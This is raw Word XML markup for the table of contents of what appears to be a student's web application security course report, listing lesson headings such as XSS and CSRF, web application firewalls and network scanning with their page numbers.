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 xml:space="preserve">Mohammed Nasser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alshukaili</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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6726E3AF" w14:textId="0245AF4D" w:rsidR="00901855" w:rsidRDefault="00531F31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>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5782511" w:history="1">
            <w:r w:rsidR="00901855" w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUCTION</w:t>
            </w:r>
            <w:r w:rsidR="00901855">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00901855">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00901855">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782511 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00901855">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00901855">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00901855">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00901855">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59F98C23" w14:textId="62D75056" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782512" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IT Background</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782512 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5581F334" w14:textId="53205E64" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782513" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(BOK) Web Application Security (week 1-4)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782513 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="755BFF95" w14:textId="1D6CBB9E" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782514" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exercises &amp; Challenges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782514 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6568F455" w14:textId="2019DED8" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782515" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 1.3 (Security Threat)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782515 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06724ECD" w14:textId="17097065" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782516" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The CIA triad.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782516 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A45D3DB" w14:textId="361A11D9" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782517" w:history="1">
            <w:r w:rsidRPr="00D20450">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5782517 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13DD5A0B" w14:textId="5C1588A3" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782518" w:history="1">
            <w:r w:rsidRPr="00D20450">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5782518 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DD41789" w14:textId="5627BBF4" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782519" w:history="1">
            <w:r w:rsidRPr="00D20450">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5782519 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C97BDCF" w14:textId="40507CA1" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782520" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 1.3 (Risk Analysis)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782520 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24597C47" w14:textId="5F028D86" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782521" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 2.2 (Host Intrusion Detection and Prevention (HIDS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782521 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18016D9D" w14:textId="3D558D1D" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782522" w:history="1">
            <w:r w:rsidRPr="00D20450">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5782522 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09D6CDE5" w14:textId="3F054E0D" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782523" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 3.2 (Web Application Firewalls)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782523 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10A583F7" w14:textId="7E4C0B94" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782524" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 4.1 (XSS &amp; CSRF)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782524 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38C44FEE" w14:textId="7341706E" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782525" w:history="1">
            <w:r w:rsidRPr="00D20450">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5782525 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E3B35F3" w14:textId="6E039DEC" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782526" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 5.1 (Network Scanning and Enumeration + Sniffing)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782526 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="209198F9" w14:textId="1FF5EA55" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782527" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 5.2 (Footprinting, Reconnaissance and Social Engineering)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782527 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CA65F4D" w14:textId="76A7AFB1" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782528" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lesson 6.1 (Ne</w:t>
            </w:r>
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>work Separation and Segmentation with Firewalls)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
